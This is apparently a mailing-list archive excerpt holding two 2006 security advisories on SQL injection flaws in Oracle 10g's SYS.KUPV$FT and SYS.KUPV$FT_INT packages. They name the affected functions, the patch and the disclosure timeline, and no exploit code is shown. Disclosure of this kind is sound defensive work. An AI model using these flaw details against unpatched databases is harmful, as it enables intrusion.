if(result == 0){exit(0);};
};
};

_
FREE pop-up blocking with the new MSN Toolbar - get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

Oracle Database 10g Rel. 1 - SQL Injection in SYS.KUPV$FT

2006-01-19 Thread ak 

#

http://www.red-database-security.com/advisory/oracle_sql_injection_kupv$ft.html

###
SQL Injection in package SYS.KUPV$FT

Name  SQL Injection in package SYS.KUPV$FT
AffectedOracle 10g Release 1
SeverityHigh Risk
CategorySQL Injection
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Advisory17 Jan 2006 (V 1.00)


Details:

The package SYS.KUPV$FT contains 3 SQL injection vulnerabilities in the 
functions ATTACH_JOB, OPEN_JOB, HAS_PRIVS. Oracle fixed these vulnerabilities 
with the package dbms_assert.




Patch Information:
##
Apply the patches for Oracle CPU Jan 2006 on top of Oracle 10g Release 1.


History:

01-nov-2005 Oracle secalert was informed
02-nov-2005 Oracle secalert asked for an exploit
17-jan-2006 Oracle published CPU January 2006
17-jan-2006 Advisory published



© 2006 by Red-Database-Security GmbH
http://www.red-database-security.com/advisory/published_alerts.html

Oracle Database 10g Rel. 1 - SQL Injection in SYS.KUPV$FT_INT

2006-01-19 Thread ak 

#

http://www.red-database-security.com/advisory/oracle_sql_injection_kupv$ft_int.html

###
Name   SQL Injection in package SYS.KUPV$FT_INT Affected   Oracle 10g 
Release 1 Severity   High Risk  Category   SQL Injection Vendor URL 
http://www.oracle.com/ 
Author Alexander Kornbrust (ak at red-database-security.com) Advisory   17 
Jan 2006 (V 1.00) 

Details:

The package SYS.KUPV$FT_INT contains 16 SQL injection vulnerabilities in the 
functions ATTACH_JOB, OPEN_JOB, HAS_PRIVS. Oracle is now using bind variables 
to fix these vulnerabilities. 



Patch Information:
##
Apply the patches for Oracle CPU Jan 2006 on top of Oracle 10g Release 1.


History:

01-nov-2005 Oracle secalert was informed about vulnerabilities in
ACTIVE_JOB, ATTACH_JOB, ATTACH_POSSIBLE, CREATE_NEW_JOB, DELETE_JOB, UPDATE_JOB 
02-nov-2005 Oracle secalert asked for an exploit
17-jan-2006 Oracle published CPU January 2006
17-jan-2006 Advisory published



© 2006 by Red-Database-Security GmbH
http://www.red-database-security.com/advisory/published_alerts.html